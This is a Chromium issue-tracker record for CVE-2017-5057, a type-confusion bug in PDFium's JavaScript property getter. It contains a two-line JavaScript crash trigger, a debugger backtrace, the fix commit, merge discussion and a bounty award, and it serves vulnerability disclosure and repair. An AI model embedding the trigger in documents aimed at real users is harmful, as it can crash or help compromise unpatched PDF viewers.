Status: Fixed
Closed: Mar 2017
OS: All
Pri: 1
Type: Bug-Security
Security: type confusion in JSPropGetter of pdfium
Reported by higonggu...@gmail.com, Feb 24 2017
VULNERABILITY DETAILS
Embed the following simple JavaScript into a PDF:
var obj = new this.constructor;
obj.author=3;
Open it in Chrome and you'll see the crashed PDF viewer plugin.

The constructor of the document object (or app, console, global etc.) should not be exported to user JavaScript. When an object is created with these constructors, the internal fields of the object are not initialized, and accessing any property will cause a type confusion. The crash is as follows:
Program received signal SIGSEGV, Segmentation fault.
0x000000000078c8f5 in std::unique_ptr<CJS_EmbedObj, std::default_delete<CJS_EmbedObj> >::get (this=0xe97ff80000000008)
    at ../../build/linux/debian_wheezy_amd64-sysroot/usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../include/c++/4.6/bits/unique_ptr.h:217
217	      { return std::get<0>(_M_t); }
(gdb) bt
#0  0x000000000078c8f5 in std::unique_ptr<CJS_EmbedObj, std::default_delete<CJS_EmbedObj> >::get (this=0xe97ff80000000008)
    at ../../build/linux/debian_wheezy_amd64-sysroot/usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../include/c++/4.6/bits/unique_ptr.h:217
#1  0x000000000078c719 in CJS_Object::GetEmbedObject (this=0xe97ff80000000000) at ../../third_party/pdfium/fpdfsdk/javascript/JS_Object.h:47	
#2  0x00000000007c111b in JSPropGetter<Document, &Document::author> (prop_name_string=0x91ad23 "author", class_name_string=0x91ad1a "Document", property=..., info=...)
    at ../../third_party/pdfium/fpdfsdk/javascript/JS_Define.h:84
#3  0x00000000007bcf41 in CJS_Document::get_author_static (property=..., info=...) at ../../third_party/pdfium/fpdfsdk/javascript/Document.h:306
#4  0x00007ffff747d46d in v8::internal::PropertyCallbackArguments::Call (this=<optimized out>, f=<optimized out>, name=...) at ../../v8/src/api-arguments-inl.h:32
#5  0x00007ffff7529de7 in v8::internal::Object::GetPropertyWithAccessor (it=<optimized out>) at ../../v8/src/objects.cc:1353
#6  0x00007ffff7529079 in v8::internal::Object::GetProperty (it=<optimized out>) at ../../v8/src/objects.cc:999
#7  0x00007ffff7465c93 in v8::internal::LoadIC::Load (this=<optimized out>, object=..., name=...) at ../../v8/src/ic/ic.cc:644
#8  0x00007ffff7472c37 in v8::internal::__RT_impl_Runtime_LoadIC_Miss (args=..., isolate=<optimized out>) at ../../v8/src/ic/ic.cc:2615
#9  0x00007ffff747280a in v8::internal::Runtime_LoadIC_Miss (args_length=<optimized out>, args_object=<optimized out>, isolate=<optimized out>)
    at ../../v8/src/ic/ic.cc:2598

A PoC is attached as poc1.pdf.

VERSION
Chrome Version: [56.0.2924.87] + [stable]
Operating System: [any]

Attachment: poc1.pdf (948 bytes)
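An added illustration (not pdfium's code) of the defect shape described in the report and of the initialization issue the landed CL addresses: the wrapper's native-object field is value-initialized to null, and the property getter refuses a wrapper that has no native object instead of dereferencing whatever the field holds. Class and function names are hypothetical stand-ins for CJS_Object, CJS_EmbedObj and JSPropGetter.

```cpp
#include <memory>
#include <string>

// Plays the role of CJS_EmbedObj: the native Document behind the JS wrapper.
struct EmbedObj {
  std::string author = "constructed-author";   // constructed sample value
};

// Shape of the defect: the field holding the native object has no
// initializer, so a wrapper that never went through Init() carries an
// indeterminate pointer, and get()/-> on it reads whatever bytes were there
// (compare the 0xe97ff80000000008 'this' in the report's backtrace).
struct UncheckedWrapper {
  EmbedObj* embed;                 // indeterminate until Init() runs
  void Init(EmbedObj* e) { embed = e; }
};

// Hardened shape: the field is value-initialized, so an object created on a
// path that skips Init() (the report's `new this.constructor`) holds a known
// null rather than garbage, and the null is something a getter can test for.
struct CheckedWrapper {
  std::unique_ptr<EmbedObj> embed;   // default constructor => nullptr
  void Init() { embed = std::make_unique<EmbedObj>(); }
  EmbedObj* GetEmbedObject() const { return embed.get(); }
};

// The two construction paths: the normal one attaches the native object; the
// exposed-constructor one yields a wrapper with no native object at all.
CheckedWrapper MakeViaNormalPath() {
  CheckedWrapper w;
  w.Init();
  return w;
}
CheckedWrapper MakeViaExposedConstructor() { return CheckedWrapper{}; }

// Getter in the style of JSPropGetter<Document, &Document::author>. The null
// check turns a missing native object into a reportable failure (false)
// instead of a read through an uninitialized pointer.
bool GetAuthor(const CheckedWrapper& w, std::string* out) {
  EmbedObj* obj = w.GetEmbedObject();
  if (!obj)
    return false;
  *out = obj->author;
  return true;
}
```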
Components: Internals>Plugins>PDF
Labels: Security_Impact-Stable
Owner: jochen@chromium.org
Status: Assigned
jochen@, can you please take a look at this as it is V8 and PDFium? Also can you triage as I am not sure what the implication of a type confusion here is?
Comment 2 by tsepez@chromium.org, Feb 24 2017
Cc: thestig@chromium.org dsinclair@chromium.org jochen@chromium.org
Owner: tsepez@chromium.org
CL up at https://pdfium-review.googlesource.com/2839, which fixes the initialization issue.  Hiding the constructor seems more difficult.
Comment 3 by tsepez@chromium.org, Feb 24 2017
Labels: Security_Severity-High
Probably sev high, bad address is uninitialized, and attacker may have some control over it via spraying, etc.
Project Member Comment 4 by sheriffbot@chromium.org, Feb 25 2017
Labels: M-56
Project Member Comment 5 by sheriffbot@chromium.org, Feb 25 2017
Labels: Pri-1
Labels: OS-All
Comment 7 by tsepez@chromium.org, Feb 27 2017
Cc: tsepez@chromium.org
Owner: jochen@chromium.org
CL landed, but over to jochen to check.
Project Member Comment 8 by bugdroid1@chromium.org, Feb 27 2017
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/4d175c2a5ab773d3d65acdf915149bef17ef2371

commit 4d175c2a5ab773d3d65acdf915149bef17ef2371
Author: pdfium-deps-roller <pdfium-deps-roller@chromium.org>
Date: Mon Feb 27 21:22:29 2017

Roll src/third_party/pdfium/ 73c9f3bb3..9162ff85c (2 commits).

https://pdfium.googlesource.com/pdfium.git/+log/73c9f3bb3d82..9162ff85c323

$ git log 73c9f3bb3..9162ff85c --date=short --no-merges --format='%ad %ae %s'
2017-02-24 thestig Fix nits from commit db764708.
2017-02-24 tsepez Fix uninitialized memory read in CJS_Object::GetEmbedObject()

Created with:
  roll-dep src/third_party/pdfium
BUG= 695826 

Documentation for the AutoRoller is here:
https://skia.googlesource.com/buildbot/+/master/autoroll/README.md

If the roll is causing failures, see:
http://www.chromium.org/developers/tree-sheriffs/sheriff-details-chromium#TOC-Failures-due-to-DEPS-rolls

TBR=dsinclair@chromium.org

Review-Url: https://codereview.chromium.org/2720883002
Cr-Commit-Position: refs/heads/master@{#453341}

[modify] https://crrev.com/4d175c2a5ab773d3d65acdf915149bef17ef2371/DEPS

Labels: M-57 M-58
We should merge to M57 once we verify the fix.
Owner: tsepez@chromium.org
Project Member Comment 11 by sheriffbot@chromium.org, Mar 10 2017
Labels: -M-56
Project Member Comment 12 by sheriffbot@chromium.org, Mar 14 2017
tsepez: Uh oh! This issue is still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: Merge-Request-57
Status: Fixed
Project Member Comment 14 by sheriffbot@chromium.org, Mar 14 2017
Labels: -Merge-Request-57 Hotlist-Merge-Review Merge-Review-57
This bug requires manual review: Request affecting a post-stable build
Please contact the milestone owner if you have questions.
Owners: amineer@(clank), cmasso@(bling), ketakid@(cros), govind@(desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Cc: awhalley@chromium.org
+  awhalley@ for M57 merge review. Please note M57 is already in stable and we're only taking critical and safe merges in. Thank you.
There might be a 57 spin early next week, at which point this will have had the required 48 hours in Beta for a stable merge and we should take it.

Note *please* mark bugs as fixed when the fix lands - otherwise it gets missed in the queries that help ensure security bugs get merged as needed.  Thanks! 
There is another security bug labeled with M-57; maybe you should consider it too.
https://bugs.chromium.org/p/chromium/issues/detail?id=695830
Project Member Comment 18 by sheriffbot@chromium.org, Mar 15 2017
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: reward-topanel
govind@ - good for 57
Labels: -Merge-Review-57 Merge-Approved-57
Approved for 57.  We're cutting our next candidate in a couple hours, please merge immediately.
Labels: -M-57 -Merge-Approved-57
Unfortunately this didn't merge cleanly and the trybots were having problems (though it built locally) - not picking up in 57 out of an abundance of caution.
Labels: -Hotlist-Merge-Review
Labels: -reward-topanel reward-unpaid reward-3000
Nice one! The panel decided to award $3,000 for this bug - cheers!
Labels: -reward-unpaid reward-inprocess
Labels: Release-0-M58
Labels: CVE-2017-5057
Project Member Comment 29 by sheriffbot@chromium.org, Jun 21
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot